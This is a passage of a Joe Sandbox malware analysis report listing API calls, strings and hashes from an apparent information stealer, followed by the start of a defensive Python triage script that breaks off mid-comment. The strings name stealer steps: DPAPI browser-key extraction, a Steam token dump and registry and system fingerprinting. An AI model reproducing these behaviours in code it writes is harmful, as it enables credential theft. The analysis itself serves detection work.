                              • Part of subcall function 00902AE0: RegOpenKeyExA.ADVAPI32(80000002,012EBBE8,00000000,00020119,00902A79), ref: 00902B1B
                              • Part of subcall function 00902AE0: RegQueryValueExA.ADVAPI32(00902A79,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00902B35
                              • Part of subcall function 00902AE0: RegCloseKey.ADVAPI32(00902A79), ref: 00902B3F
                            • RegOpenKeyExA.ADVAPI32(80000002,012EBBE8,00000000,00020119,008F9650), ref: 00902AA1
                            • RegQueryValueExA.ADVAPI32(008F9650,012FF4C8,00000000,00000000,00000000,000000FF), ref: 00902ABC
                            • RegCloseKey.ADVAPI32(008F9650), ref: 00902AC6
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: Windows 11
                            • API String ID: 3225020163-2517555085
                            • Opcode ID: 81e0c9242ef7f58ee4fc2b443f2b15673c9bc1cc50db8b9835ab6d3dd8f90312
                            • Instruction ID: 5bc95517dd5b215e6f06e25e990094cd1b770732366d115eab893fc279e6f585
                            • Opcode Fuzzy Hash: 81e0c9242ef7f58ee4fc2b443f2b15673c9bc1cc50db8b9835ab6d3dd8f90312
                            • Instruction Fuzzy Hash: D101ADB5B00209BFDB20DBA4AC4DFEA776CEB48715F508155FE08D7290EE709A418BE0
                            APIs
                            • LoadLibraryA.KERNEL32(?), ref: 008E723E
                            • GetProcessHeap.KERNEL32(00000008,00000010), ref: 008E7279
                            • RtlAllocateHeap.NTDLL(00000000), ref: 008E7280
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 008E72C3
                            • HeapFree.KERNEL32(00000000), ref: 008E72CA
                            • GetProcAddress.KERNEL32(00000000,?), ref: 008E7329
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                            • String ID:
                            • API String ID: 174687898-0
                            • Opcode ID: 743a280f05f8d190dd06910ae516142c07f69419da3577f8366d7ba9f688e52d
                            • Instruction ID: b84375b852b2aad4f8a7ecdc66df20e96b698ae4e5c584446dc758f5da507825
                            • Opcode Fuzzy Hash: 743a280f05f8d190dd06910ae516142c07f69419da3577f8366d7ba9f688e52d
                            • Instruction Fuzzy Hash: F0418C717057469BDB60CFAADC84BAAB3E8FB8A305F544569ED4EC7300E631E900DB50
                            APIs
                            • lstrcpy.KERNEL32(00000000), ref: 008E9CA8
                            • LocalAlloc.KERNEL32(00000040,?), ref: 008E9CDA
                            • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 008E9D03
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocLocallstrcpy
                            • String ID: $"encrypted_key":"$DPAPI
                            • API String ID: 2746078483-738592651
                            • Opcode ID: fe786fc47bd9205db919abb209108a5836ce7a072c51674e8b6c898c327c7cd2
                            • Instruction ID: 70aa365482731d95018af008d9499478ab8f29017f0eb06daf7058d66f73e517
                            • Opcode Fuzzy Hash: fe786fc47bd9205db919abb209108a5836ce7a072c51674e8b6c898c327c7cd2
                            • Instruction Fuzzy Hash: E041D272A002A99BCB31EF6ADC41AEE77B4FF96304F054464E995E7352DAB0ED00C781
                            APIs
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 008FEC04
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FEC33
                            • lstrcat.KERNEL32(?,00000000), ref: 008FEC41
                            • lstrcat.KERNEL32(?,0091179C), ref: 008FEC5A
                            • lstrcat.KERNEL32(?,012F9370), ref: 008FEC6D
                            • lstrcat.KERNEL32(?,0091179C), ref: 008FEC7F
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FolderPathlstrcpy
                            • String ID:
                            • API String ID: 818526691-0
                            • Opcode ID: 99a64a76371836f570cfc106082e293ab752b98063833b260aaab87d9e1b52e5
                            • Instruction ID: 6ea5b15f08de7a5d4784e3eaf7a4d4e986f415851e0c18bed6a6255bfe37f6c5
                            • Opcode Fuzzy Hash: 99a64a76371836f570cfc106082e293ab752b98063833b260aaab87d9e1b52e5
                            • Instruction Fuzzy Hash: 41416672A1016DAFCB15EB78DC46EED7778FF88300F404468BA1AD7291DE709E848B91
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008FEEBF
                            • lstrlen.KERNEL32(00000000), ref: 008FEED6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008FEEFD
                            • lstrlen.KERNEL32(00000000), ref: 008FEF04
                            • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 008FEF32
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID: steam_tokens.txt
                            • API String ID: 367037083-401951677
                            • Opcode ID: da7dd024a93238d63170453ee31cd9e9c87d2f1f735712016ad347a5dbbe835d
                            • Instruction ID: 5bc6ec867a20db78ce38610bc51993aa5c03cf898551daf0145fc9e69aaa70c1
                            • Opcode Fuzzy Hash: da7dd024a93238d63170453ee31cd9e9c87d2f1f735712016ad347a5dbbe835d
                            • Instruction Fuzzy Hash: D9318132A111995FC721BB3DEC4AAAE7BA8FF41710F044170B905DB262DF64DD0687C2
                            APIs
                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,008E140E), ref: 008E9A9A
                            • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,008E140E), ref: 008E9AB0
                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,008E140E), ref: 008E9AC7
                            • ReadFile.KERNEL32(00000000,00000000,?,008E140E,00000000,?,?,?,008E140E), ref: 008E9AE0
                            • LocalFree.KERNEL32(?,?,?,?,008E140E), ref: 008E9B00
                            • CloseHandle.KERNEL32(00000000,?,?,?,008E140E), ref: 008E9B07
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                            • String ID:
                            • API String ID: 2311089104-0
                            • Opcode ID: cde7e7764a25e0e988d01d2937607e0fcf3b0bf35d7a1126daf336ffa9fd15ca
                            • Instruction ID: 8075adf4e08a4be3bd4bbe8c5e3b68784dd34b85aa67f8c928af3a5424719e7e
                            • Opcode Fuzzy Hash: cde7e7764a25e0e988d01d2937607e0fcf3b0bf35d7a1126daf336ffa9fd15ca
                            • Instruction Fuzzy Hash: 93115E71600259EFE710DFAADCC8EAA736CFB46350F504169F905E7280EBB09D40CBA0
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00905D24
                              • Part of subcall function 0090A383: std::exception::exception.LIBCMT ref: 0090A398
                              • Part of subcall function 0090A383: std::exception::exception.LIBCMT ref: 0090A3BE
                            • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00905D8C
                            • memmove.MSVCRT(00000000,?,?), ref: 00905D99
                            • memmove.MSVCRT(00000000,?,?), ref: 00905DA8
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                            • String ID: vector<T> too long
                            • API String ID: 2052693487-3788999226
                            • Opcode ID: 7a6093b1d9780bed243bb3010775b950aec62b7fbf6f73d54281629eea5ac775
                            • Instruction ID: 94b4e15c77225e78243fac9f3e6db2f310a60bb01a64798003eace7085e43425
                            • Opcode Fuzzy Hash: 7a6093b1d9780bed243bb3010775b950aec62b7fbf6f73d54281629eea5ac775
                            • Instruction Fuzzy Hash: AF415171B005199FCF14DF6CC895AAEBBB5EB88710F15866AE919E7384D7309D018FD0
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 008F7E98
                              • Part of subcall function 0090A3D0: std::exception::exception.LIBCMT ref: 0090A3E5
                              • Part of subcall function 0090A3D0: std::exception::exception.LIBCMT ref: 0090A40B
                            • std::_Xinvalid_argument.LIBCPMT ref: 008F7EB6
                            • std::_Xinvalid_argument.LIBCPMT ref: 008F7ED1
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_$std::exception::exception
                            • String ID: invalid string position$string too long
                            • API String ID: 3310641104-4289949731
                            • Opcode ID: 7504b4542069367fdc07c092959375fc3251be3bb620754248ba7dddf4e90c93
                            • Instruction ID: cc1455847a5140fc131c0daf8c27d356d1d2280a4d25c95cd0dd7843da974d85
                            • Opcode Fuzzy Hash: 7504b4542069367fdc07c092959375fc3251be3bb620754248ba7dddf4e90c93
                            • Instruction Fuzzy Hash: 922195323083484BE724DE7CE880A3AB7E5FB95B14B20496EF556CB681D771DC4487A1
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009035BF
                            • RtlAllocateHeap.NTDLL(00000000), ref: 009035C6
                            • GlobalMemoryStatusEx.KERNEL32 ref: 009035E1
                            • wsprintfA.USER32 ref: 00903607
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                            • String ID: %d MB
                            • API String ID: 2922868504-2651807785
                            • Opcode ID: b20e00da5663941211e74e54266343eb352e36dd4be37f4c14c0c9570034ff8e
                            • Instruction ID: ae0fd348091ed9ddc1ec174a76fec4e0b59aaf8204f1dc3fccad7eed84970535
                            • Opcode Fuzzy Hash: b20e00da5663941211e74e54266343eb352e36dd4be37f4c14c0c9570034ff8e
                            • Instruction Fuzzy Hash: 1C01B571E04654AFD7049B98DD49BAEB7BCFB44710F404629F905E73D0DB749E0086A1
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000001,012FE1E0,00000000,00020119,?), ref: 008FD9E5
                            • RegQueryValueExA.ADVAPI32(?,012FF738,00000000,00000000,00000000,000000FF), ref: 008FDA09
                            • RegCloseKey.ADVAPI32(?), ref: 008FDA13
                            • lstrcat.KERNEL32(?,00000000), ref: 008FDA38
                            • lstrcat.KERNEL32(?,012FF7F8), ref: 008FDA4C
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$CloseOpenQueryValue
                            • String ID:
                            • API String ID: 690832082-0
                            • Opcode ID: be0eeaf873f8b8c11c0d00893b559976ab1668f6bab3d6d827a6b0a8a45b8050
                            • Instruction ID: 5db8d975dfb460fc96403bd036643cc8a551c9af649c7c08b47659e6a84f8dea
                            • Opcode Fuzzy Hash: be0eeaf873f8b8c11c0d00893b559976ab1668f6bab3d6d827a6b0a8a45b8050
                            • Instruction Fuzzy Hash: 96413F71A1024CABCB54EB69EC86FDE77B9FB54340F408064B609D7251EE70AA85CF92
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 008F8071
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F80A0
                            • StrCmpCA.SHLWAPI(00000000,00911C80), ref: 008F80E5
                            • StrCmpCA.SHLWAPI(00000000,00911C80), ref: 008F8113
                            • StrCmpCA.SHLWAPI(00000000,00911C80), ref: 008F8147
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 48227d5513226f613a64aaa6e0ec86a298eac500a671371020c2d039fd9564bf
                            • Instruction ID: 36f1345c8fbac0776fd98c302f03a5947c3cca25d0c581cac156628c284cd5c9
                            • Opcode Fuzzy Hash: 48227d5513226f613a64aaa6e0ec86a298eac500a671371020c2d039fd9564bf
                            • Instruction Fuzzy Hash: AF41A134A0051EDFCB20DF28D884EAA77B4FF89304F514599E905DB210DF71EAAACB91
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 008F81FB
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F822A
                            • StrCmpCA.SHLWAPI(00000000,00911C80), ref: 008F8242
                            • lstrlen.KERNEL32(00000000), ref: 008F8280
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F82AF
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                             • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 52f5e46ac644d10e5f2df53fe922e7803e9ac2cab215ac55930ccbf9e3fa7d85
                            • Instruction ID: 13b7f21485ef3274f6f692976e37e54498d974418bcec667bbe7dfb0a5574f62
                            • Opcode Fuzzy Hash: 52f5e46ac644d10e5f2df53fe922e7803e9ac2cab215ac55930ccbf9e3fa7d85
                            • Instruction Fuzzy Hash: BD416C7560060ADFCB21DF7CD984BAABBB8FF44700F108569A949D7245EF74E941CB90
                            APIs
                            • GetSystemTime.KERNEL32(?), ref: 00901D42
                              • Part of subcall function 009019F0: lstrcpy.KERNEL32(00000000,0090CFF4), ref: 00901A1F
                              • Part of subcall function 009019F0: lstrlen.KERNEL32(012E6CF0), ref: 00901A30
                              • Part of subcall function 009019F0: lstrcpy.KERNEL32(00000000,00000000), ref: 00901A57
                              • Part of subcall function 009019F0: lstrcat.KERNEL32(00000000,00000000), ref: 00901A62
                              • Part of subcall function 009019F0: lstrcpy.KERNEL32(00000000,00000000), ref: 00901A91
                              • Part of subcall function 009019F0: lstrlen.KERNEL32(00914FA4), ref: 00901AA3
                              • Part of subcall function 009019F0: lstrcpy.KERNEL32(00000000,00000000), ref: 00901AC4
                              • Part of subcall function 009019F0: lstrcat.KERNEL32(00000000,00914FA4), ref: 00901AD0
                              • Part of subcall function 009019F0: lstrcpy.KERNEL32(00000000,00000000), ref: 00901AFF
                            • sscanf.NTDLL ref: 00901D6A
                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00901D86
                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00901D96
                            • ExitProcess.KERNEL32 ref: 00901DB3
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                             • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                            • String ID:
                            • API String ID: 3040284667-0
                            • Opcode ID: ad2d7ed730808e4f3df17e85c47237c03520c45ed2656db51a3456b75bf1ab3f
                            • Instruction ID: 4ad80b312351af3b634f1e04245e4476bd6910f9593867ab310121e68d250386
                            • Opcode Fuzzy Hash: ad2d7ed730808e4f3df17e85c47237c03520c45ed2656db51a3456b75bf1ab3f
                            • Instruction Fuzzy Hash: 2921E2B5518341AF8354DF69D88489BBBF9EFC8314F408A1EF599C3260EB30D5048BA2
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00903336
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0090333D
                            • RegOpenKeyExA.ADVAPI32(80000002,012EBCC8,00000000,00020119,?), ref: 0090335C
                            • RegQueryValueExA.ADVAPI32(?,012FE300,00000000,00000000,00000000,000000FF), ref: 00903377
                            • RegCloseKey.ADVAPI32(?), ref: 00903381
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                             • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: 00431c252cf6d3ac5dd8dd3f72dbb5e8e1c996b8d56cc76fed1d2319917067c5
                            • Instruction ID: c04dc5c47abf706c3f72d7046d91258fa3e28dd70be15df2ef747af82f363d0d
                            • Opcode Fuzzy Hash: 00431c252cf6d3ac5dd8dd3f72dbb5e8e1c996b8d56cc76fed1d2319917067c5
                            • Instruction Fuzzy Hash: 9C114FB2A40245AFD710CB95ED49FEBBBBCF788B11F508229FA05D3680DB7559008BE1
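The API listings above are the only behavioural evidence this section gives per function: the GetSystemTime / sscanf / SystemTimeToFileTime / ExitProcess sequence at 00901D42 and the RegOpenKeyExA / RegQueryValueExA read at 0090335C. The Python script below is an added example and is not part of the Joe Sandbox report or its tooling: it parses entries in exactly the text shape printed above, separates a function's own calls from "Part of subcall" lines, decodes the hKey and samDesired constants of RegOpenKeyExA, and matches ordered call-sequence rules for triage. The two sample entries embedded in it are copied from the listings above and are labelled as constructed input; the rule names (in particular "time-gated exit") are this example's reading of the call sequences, not labels the report assigns.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: two entries copied from the listings for 00901D42 and 00903336 above.
SAMPLE = """\
APIs
• GetSystemTime.KERNEL32(?), ref: 00901D42
  • Part of subcall function 009019F0: lstrcpy.KERNEL32(00000000,0090CFF4), ref: 00901A1F
• sscanf.NTDLL ref: 00901D6A
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00901D86
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00901D96
• ExitProcess.KERNEL32 ref: 00901DB3
Memory Dump Source
APIs
• GetProcessHeap.KERNEL32(00000000,00000104), ref: 00903336
• RtlAllocateHeap.NTDLL(00000000), ref: 0090333D
• RegOpenKeyExA.ADVAPI32(80000002,012EBCC8,00000000,00020119,?), ref: 0090335C
• RegQueryValueExA.ADVAPI32(?,012FE300,00000000,00000000,00000000,000000FF), ref: 00903377
• RegCloseKey.ADVAPI32(?), ref: 00903381
Memory Dump Source
"""
# One API line: optional "Part of subcall function X:" prefix, Name.MODULE, optional "(args)",
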